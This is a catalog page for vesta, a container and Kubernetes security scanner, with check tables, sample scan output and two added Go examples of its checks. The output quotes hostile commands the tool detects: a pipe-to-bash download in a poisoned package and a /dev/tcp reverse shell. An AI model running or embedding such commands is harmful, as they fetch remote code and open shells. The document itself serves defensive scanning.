
vesta

Cloud-native security check tool
License: Apache
Language: Google Go
Category: Cloud computing, cloud native
Software type: Open source
Region: China
Submitted by: 封烨伟
Operating system: Cross-platform
Open-source organization:
Target audience: Unknown
Software overview

vesta is a tool that combines container scanning with Docker and Kubernetes configuration baseline checks. It scans images and containers for components with vulnerable versions, and checks Docker and Kubernetes for dangerous configurations. vesta is also flexible and easy to run: it works on all kinds of systems with as little as 1 vCPU and 2 GB of memory, including but not limited to Windows, Linux and macOS.

Check items

Scan

  • Scan for vulnerabilities in programs installed through the mainstream package managers
    • apt/apt-get
    • rpm
    • yum
    • dpkg
  • Scan for vulnerable software dependencies and maliciously poisoned dependency packages
    • Java (Jar, War, and mainstream dependencies such as log4j)
    • NodeJs (NPM, YARN)
    • Python (Wheel, Poetry)
    • Golang (Go binary)
    • PHP (Composer, and mainstream PHP frameworks: laravel, thinkphp, wordpress, wordpress plugins, etc.)
    • Rust (Rust binary)
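The apt/dpkg scan listed above comes down to two pieces: reading the installed package list from the dpkg status file and comparing Debian versions the way dpkg does. The following Go program is an added illustration, not vesta's own code: it parses the stanza format of /var/lib/dpkg/status (skipping packages that are removed but still listed because of leftover config files), reimplements dpkg's version ordering (epoch, then upstream, then revision, with digit runs compared numerically and `~` sorting before everything), and reports installed packages older than an advisory's fixed version. The status stanza, the advisory IDs and the fixed-in versions are constructed for the example and do not come from a real vulnerability feed.

```go
package main

import (
	"fmt"
	"strings"
)

type Package struct{ Name, Version string }                   // one entry from a dpkg status file
type Advisory struct{ Package, FixedIn, ID, Severity string } // FixedIn: first version carrying the fix
type Match struct{ Pkg Package; Adv Advisory }                // an installed package still affected

// ParseDpkgStatus parses the stanza format of /var/lib/dpkg/status, keeping only packages
// whose Status ends in "installed": a removed package with leftover config files is skipped.
func ParseDpkgStatus(status string) []Package {
	var pkgs []Package
	for _, stanza := range strings.Split(status, "\n\n") {
		p, installed := Package{}, false
		for _, line := range strings.Split(stanza, "\n") {
			switch {
			case strings.HasPrefix(line, "Package: "): p.Name = strings.TrimSpace(line[9:])
			case strings.HasPrefix(line, "Version: "): p.Version = strings.TrimSpace(line[9:])
			case strings.HasPrefix(line, "Status: "): installed = strings.HasSuffix(strings.TrimSpace(line), " installed")
			}
		}
		if p.Name != "" && installed { pkgs = append(pkgs, p) }
	}
	return pkgs
}
// at/isDigit/order/verrevcmp reimplement dpkg's verrevcmp: digit runs compare numerically,
// letters sort before other symbols, and "~" sorts before everything, even end-of-string.
func at(s string, i int) byte { if i < len(s) { return s[i] }; return 0 }
func isDigit(c byte) bool   { return c >= '0' && c <= '9' }
func order(c byte) int {
	switch {
	case c == 0 || isDigit(c): return 0
	case c >= 'a' && c <= 'z' || c >= 'A' && c <= 'Z': return int(c)
	case c == '~': return -1
	}
	return int(c) + 256
}
func verrevcmp(a, b string) int {
	i, j := 0, 0
	for i < len(a) || j < len(b) {
		firstDiff := 0
		for (i < len(a) && !isDigit(a[i])) || (j < len(b) && !isDigit(b[j])) {
			if ac, bc := order(at(a, i)), order(at(b, j)); ac != bc { return ac - bc }
			i, j = i+1, j+1
		}
		for at(a, i) == '0' { i++ } // leading zeros of a digit run are not significant
		for at(b, j) == '0' { j++ }
		for isDigit(at(a, i)) && isDigit(at(b, j)) {
			if firstDiff == 0 { firstDiff = int(a[i]) - int(b[j]) }
			i, j = i+1, j+1
		}
		if isDigit(at(a, i)) { return 1 } // the longer digit run is the larger number
		if isDigit(at(b, j)) { return -1 }
		if firstDiff != 0 { return firstDiff }
	}
	return 0
}
// splitVersion splits "[epoch:]upstream[-revision]"; CompareDebVersions orders epoch, then
// upstream, then revision, and returns <0, 0 or >0 like strcmp.
func splitVersion(v string) (epoch, upstream, revision string) {
	epoch = "0"
	if i := strings.Index(v, ":"); i >= 0 { epoch, v = v[:i], v[i+1:] }
	if i := strings.LastIndex(v, "-"); i >= 0 { return epoch, v[:i], v[i+1:] }
	return epoch, v, ""
}
func CompareDebVersions(a, b string) int {
	ea, ua, ra := splitVersion(a)
	eb, ub, rb := splitVersion(b)
	if c := verrevcmp(ea, eb); c != 0 { return c }
	if c := verrevcmp(ua, ub); c != 0 { return c }
	return verrevcmp(ra, rb)
}
// ScanInstalled reports every installed package that is older than an advisory's fixed version.
func ScanInstalled(status string, advs []Advisory) []Match {
	var out []Match
	for _, p := range ParseDpkgStatus(status) {
		for _, a := range advs {
			if a.Package == p.Name && CompareDebVersions(p.Version, a.FixedIn) < 0 { out = append(out, Match{p, a}) }
		}
	}
	return out
}
// Constructed sample input: one status stanza and one placeholder advisory whose fixed-in
// version and ID are invented for this example, not taken from any real feed.
const sampleStatus = `Package: openssl
Status: install ok installed
Version: 1.1.1k-1+deb11u1
`
var sampleAdvisories = []Advisory{{"openssl", "1.1.1n-0+deb11u5", "ADV-EXAMPLE-0001", "high"}}

func main() {
	for _, m := range ScanInstalled(sampleStatus, sampleAdvisories) {
		fmt.Printf("%-8s %s %s: installed %s, fixed in %s\n", m.Adv.Severity, m.Adv.ID, m.Pkg.Name, m.Pkg.Version, m.Adv.FixedIn)
	}
}
```

Running it prints the single openssl match. The ordering rules matter for correctness: a naive string or float comparison would rank 1.10 below 1.9 and 1.0~rc1 above 1.0, producing both missed and false findings.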

Docker checks

| Supported Check Item | Description | Severity | Reference |
|---|---|---|---|
| PrivilegeAllowed | Dangerous privileged mode | critical | Ref |
| Capabilities | Dangerous capabilities are set | critical | Ref |
| Volume Mount | Sensitive or dangerous directory is mounted | critical | Ref |
| Docker Unauthorized | Port 2375 is open and unauthenticated | critical | Ref |
| Kernel version | Current kernel version has a container escape vulnerability | critical | Ref |
| Network Module | Network mode is host, or is host together with a specific containerd version | critical/medium | |
| Pid Module | PID mode is set to host | high | |
| Docker Server version | Docker Server version is vulnerable | critical/high/medium/low | |
| Docker env password check | Weak password in the Docker env | high/medium | |
| Image tag check | Image is untagged or uses the default latest tag | low | |
| Docker history | Docker layers contain insecure commands | high/medium | |
| Docker Backdoor | Docker env command contains a malicious command | critical/high | |

Kubernetes checks

| Supported Check Item | Description | Severity | Reference |
|---|---|---|---|
| PrivilegeAllowed | Dangerous privileged mode | critical | Ref |
| Capabilities | Dangerous capabilities are set | critical | Ref |
| PV and PVC | PV is mounted on a sensitive directory and its status is active | critical/medium | Ref |
| RBAC | K8s permissions contain dangerous configuration | high/medium/low/warning | |
| Kubernetes-dashboard | Checks --enable-skip-login and the dashboard account permissions | critical/high/low | Ref |
| Kernel version | Current kernel version has a container escape vulnerability | critical | Ref |
| Docker Server version (k8s version below v1.24) | Docker Server version is vulnerable | critical/high/medium/low | |
| Kubernetes certificate expiration | Certificate expires in less than 30 days | medium | |
| ConfigMap and Secret check | Weak password in a ConfigMap or Secret | high/medium | |
| PodSecurityPolicy check (k8s version below v1.25) | PodSecurityPolicy is too tolerant of insecure Pod configuration | high/medium/low | Ref |
| Auto Mount ServiceAccount Token | Pod mounts the service account token by default | critical/high/medium/low | Ref |
| NoResourceLimits | No limits on resource usage, e.g. CPU, memory, storage | low | Ref |
| Job and Cronjob | Job or CronJob has no seccomp or SELinux security policy | low | Ref |
| Envoy admin | Envoy admin is configured and listens on 0.0.0.0 | high/medium | Ref |
| Cilium version | Vulnerable Cilium version | critical/high/medium/low | Ref |
| Istio configurations | Vulnerable Istio version and security configuration check | critical/high/medium/low | Ref |
| Kubelet 10255 and Kubectl proxy | Port 10255 is open or kubectl proxy is enabled | high/medium/low | |
| Etcd configuration | Etcd security configuration check | high/medium | |
| Sidecar configurations | Sidecar security configuration and env check | critical/high/medium/low | |
| Pod annotation | Insecure configuration in Pod annotation | high/medium/low/warning | Ref |
| DaemonSet | Insecure DaemonSet configuration | critical/high/medium/low | |
| Backdoor | Checks whether k8s contains a backdoor | critical/high | Ref |
| Lateral admin movement | Pod is deliberately scheduled onto a master node | medium/low | |
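Several rows in the two tables above (PrivilegeAllowed, Capabilities, Volume Mount, Pid Module, Network Module, Image tag check, Auto Mount ServiceAccount Token, NoResourceLimits) are pure configuration checks: they need no vulnerability database, only the object's spec and a rule per field. The Go program below is an added example, not vesta's implementation, that runs that kind of baseline over a Pod manifest and reports findings with a severity, the offending parameter and its value, the same shape as the result tables later on the page. It decodes a hand-written subset of the Pod schema with the standard library only (no k8s.io packages), the capability and host-path deny-lists are short constructed lists, and the sample manifest with its registry, image names and container names is invented for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)
// Hand-written subset of the Pod schema. Field names follow the real API (encoding/json
// matches them case-insensitively), but nothing is imported from k8s.io, so this runs offline.
type Pod struct {
	Spec struct {
		HostPID, HostNetwork         bool
		AutomountServiceAccountToken *bool
		Volumes                      []struct{ Name string; HostPath *struct{ Path string } }
		Containers                   []Container
	}
}
type Container struct {
	Name, Image     string
	SecurityContext *struct{ Privileged *bool; Capabilities *struct{ Add []string } }
	Resources       struct{ Limits map[string]string }
}
type Finding struct{ Severity, Param, Value, Description string }
// Constructed deny-lists for the example; a production rule set would be longer.
var dangerousCaps = map[string]bool{"SYS_ADMIN": true, "SYS_PTRACE": true, "SYS_MODULE": true, "NET_ADMIN": true, "DAC_READ_SEARCH": true}
var sensitiveHostPaths = []string{"/", "/etc", "/proc", "/root", "/var/run/docker.sock", "/var/lib/kubelet"}
// imageHasPinnedTag accepts a digest reference or an explicit non-latest tag; the tag is read
// after the last "/" so a registry port (host:5000/img) is not mistaken for one.
func imageHasPinnedTag(img string) bool {
	if strings.Contains(img, "@") { return true }
	last := img[strings.LastIndex(img, "/")+1:]
	i := strings.Index(last, ":")
	return i >= 0 && last[i+1:] != "latest"
}
// CheckPod applies the baseline checks to one pod and returns every finding.
func CheckPod(p *Pod) []Finding {
	var out []Finding
	add := func(sev, param, val, desc string) { out = append(out, Finding{sev, param, val, desc}) }
	if p.Spec.HostPID { add("high", "hostPID", "true", "pod shares the node's PID namespace") }
	if p.Spec.HostNetwork { add("medium", "hostNetwork", "true", "pod shares the node's network namespace") }
	// automountServiceAccountToken defaults to true when omitted, so absence is itself a finding.
	if t := p.Spec.AutomountServiceAccountToken; t == nil || *t {
		add("medium", "automountServiceAccountToken", "true", "service account token mounted into every container")
	}
	for _, v := range p.Spec.Volumes {
		if v.HostPath == nil { continue }
		for _, s := range sensitiveHostPaths {
			if v.HostPath.Path == s || strings.HasPrefix(v.HostPath.Path, s+"/") {
				add("critical", "volumes."+v.Name+".hostPath", v.HostPath.Path, "sensitive host path is mounted")
				break
			}
		}
	}
	for _, c := range p.Spec.Containers {
		if sc := c.SecurityContext; sc != nil {
			if sc.Privileged != nil && *sc.Privileged {
				add("critical", c.Name+".privileged", "true", "privileged container has full access to the host")
			}
			if sc.Capabilities != nil {
				for _, cp := range sc.Capabilities.Add {
					if dangerousCaps[strings.TrimPrefix(strings.ToUpper(cp), "CAP_")] {
						add("critical", c.Name+".capabilities.add", cp, "dangerous capability added")
					}
				}
			}
		}
		if !imageHasPinnedTag(c.Image) { add("low", c.Name+".image", c.Image, "image is untagged or uses :latest") }
		for _, r := range []string{"cpu", "memory"} {
			if c.Resources.Limits[r] == "" { add("low", c.Name+".resources.limits."+r, "unset", r+" usage is not limited") }
		}
	}
	return out
}
// CheckManifest decodes a pod manifest (JSON; any YAML manifest converts to it) and checks it.
func CheckManifest(manifest []byte) ([]Finding, error) {
	var p Pod
	if err := json.Unmarshal(manifest, &p); err != nil { return nil, err }
	return CheckPod(&p), nil
}
// Constructed sample manifest: registry, image names and container names are invented.
const sampleManifest = `{
  "metadata": {"name": "demo-pod", "namespace": "default"},
  "spec": {
    "hostPID": true,
    "volumes": [{"name": "sock", "hostPath": {"path": "/var/run/docker.sock"}}],
    "containers": [
      {"name": "app", "image": "registry.example:5000/app:latest",
       "securityContext": {"privileged": true}, "resources": {"limits": {"cpu": "500m"}}},
      {"name": "sidecar", "image": "registry.example:5000/sidecar:1.2.3",
       "securityContext": {"capabilities": {"add": ["SYS_ADMIN", "NET_BIND_SERVICE"]}},
       "resources": {"limits": {"cpu": "100m", "memory": "64Mi"}}}
    ]
  }
}`

func main() {
	fs, err := CheckManifest([]byte(sampleManifest))
	if err != nil { panic(err) }
	for _, f := range fs { fmt.Printf("%-8s %-34s %-26s %s\n", f.Severity, f.Param, f.Value, f.Description) }
}
```

On the sample pod this yields seven findings: three critical (the docker.sock mount, the privileged app container, SYS_ADMIN on the sidecar), one high (hostPID), one medium (the omitted automountServiceAccountToken, which Kubernetes treats as true) and two low (the :latest tag and the missing memory limit on app). Note the two places where the default is the unsafe choice: an omitted automountServiceAccountToken and an omitted resource limit both produce findings, which is why the checker inspects absence rather than only explicit values.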

Building and using vesta

  1. Build vesta
  • Build with make build
  • Download the executable from Releases
  2. Use vesta to check vulnerable component versions in an image or container (an image ID, an image tag, or a file passed with -f all work)
$./vesta scan container -f example.tar

2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3           | CVE-2019-14232   |   7.5 | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4. If                                       |
|     |                    |                 |                  |       |          | django.utils.text.Truncator's                                    |
|     |                    |                 |                  |       |          | chars() and words() methods                                      |
|     |                    |                 |                  |       |          | were passed the html=True                                        |
|     |                    |                 |                  |       |          | argument, t ...                                                  |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 |                    | 2.2.3           | CVE-2019-14233   |   7.5 | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4.                                          |
|     |                    |                 |                  |       |          | Due to the behaviour of                                          |
|     |                    |                 |                  |       |          | the underlying HTMLParser,                                       |
|     |                    |                 |                  |       |          | django.utils.html.strip_tags                                     |
|     |                    |                 |                  |       |          | would be extremely ...                                           |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 |                    | 2.2.3           | CVE-2019-14234   |   9.8 | critical | An issue was discovered in                                       |
|     |                    |                 |                  |       |          | Django 1.11.x before 1.11.23,                                    |
|     |                    |                 |                  |       |          | 2.1.x before 2.1.11, and 2.2.x                                   |
|     |                    |                 |                  |       |          | before 2.2.4. Due to an error                                    |
|     |                    |                 |                  |       |          | in shallow key transformation,                                   |
|     |                    |                 |                  |       |          | key and index lookups for                                        |
|     |                    |                 |                  |       |          | django.contrib.postgres.f ...                                    |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy  | 1.24.2          |                  |   8.5 | high     | Malicious package is detected in                                 |
|     |                    |                 |                  |       |          | '/usr/local/lib/python3.6/site-packages/numpy/setup.py',         |
|     |                    |                 |                  |       |          | malicious command "curl https://vuln.com | bash" are             |
|     |                    |                 |                  |       |          | detected.                                                        |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
 
  3. Use vesta to check the Docker baseline configuration

It can also be run inside Docker:

make run.docker
 
$./vesta analyze docker

2022/11/29 23:06:32 Start analysing

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |          DESCRIPTION           |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  1 | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: None                   |                |                                |          | the CVE-2022-0492 with         |
|    |                            |                |                                |          | CAP_SYS_ADMIN and v1           |
|    |                            |                |                                |          | architecture of cgroups        |
|    |                            |                |                                |          | vulnerablility, has a          |
|    |                            |                |                                |          | potential container escape.    |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  2 | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility, |
|    |                            |                |                                |          | has a potential container      |
|    |                            |                |                                |          | escape.                        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  3 | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container|
|    | ID: None                   |                |                                |          | escape in privileged  module.  |
|    |                            |                |                                |          |                                |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  4 | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found            |
|    | ID: None                   |                | vesta_history_test:latest |    |          | in command: ' echo             |
|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' >        |
|    |                            |                |                                |          | config.ini # buildkit'.        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
 
  4. Use vesta to check the Kubernetes baseline configuration
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Geting docker server version
2022/11/29 23:15:59 Geting kernel version

Detected 4 vulnerabilities

Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  1 | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |
|    | default | Status: Running |    | Privileged                     |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest |       | Token:Password123456           | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |
|    |                                | env                            |                                |                       |          | found weak password:           |
|    |                                |                                |                                |                       |          | 'Password123456'.              |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i >&            | Sidecar Env           | high     | Container 'sidecartest' finds  |
|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0>&1    |                       |          | high risk content(score:       |
|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |
|    |                                |                                |                                |                       |          | suspect command backdoor.      |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  2 | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |
|    | default | Status: Running |    | capabilities                   |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |
|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |
|    |                                |                                |                                |                       |          | given, which will cause a      |
|    |                                |                                |                                |                       |          | potential container escape.    |
|    |                                |                                |                                |                       |          | Reference clsuterRolebind:     |
|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |
|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |
|    |                                | Resource                       |                                |                       |          |                                |
|    |                                |                                |                                |                       |          |                                |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  1 | K8s version less than v1.24 | kernel version                 | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |
|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |
|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |
|    |                             |                                |                                                        |          | has a potential container      |
|    |                             |                                |                                                        |          | escape.                        |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  2 | ConfigMap                   | ConfigMap Name: vulnconfig     | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high     | ConfigMap has found weak       |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  3 | Secret                      | Secret Name: vulnsecret-auth   | password:Password123                                   | high     | Secret has found weak          |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  4 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | vuln-clusterrolebinding |      | create, update | resources:                            |          | resources given to the         |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | default service account, which |
|    |                             | kind: ClusterRole | subject    |                                                        |          | will cause a potential data    |
|    |                             | kind: Group | subject name:    |                                                        |          | leakage.                       |
|    |                             | system:serviceaccounts:vuln |  |                                                        |          |                                |
|    |                             | namespace: vuln                |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  5 | RoleBinding                 | binding name: vuln-rolebinding | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | | rolename: vuln-role | role   | create, update | resources:                            |          | resources given to the         |
|    |                             | kind: Role | subject kind:     | pods, services                                         |          | default service account, which |
|    |                             | ServiceAccount | subject name: |                                                        |          | will cause a potential data    |
|    |                             | default | namespace: default   |                                                        |          | leakage.                       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  6 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | warning  | Key permission are given       |
|    |                             | vuln-clusterrolebinding2 |     | create, update | resources:                            |          | to unknown user 'testUser',    |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | printing it for checking.      |
|    |                             | subject kind: User | subject   |                                                        |          |                                |
|    |                             | name: testUser | namespace:    |                                                        |          |                                |
|    |                             | all                            |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
 

Usage

$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
               Tutorial is available at https://github.com/kvesta/vesta

Usage:
  vesta [command]

Available Commands:
  analyze     Kubernetes analyze
  completion  Generate the autocompletion script for the specified shell
  help        Help about any command
  scan        Container scan
  update      Update vulnerability database
  version     Print version information and quit

Flags:
  -h, --help   help for vesta
 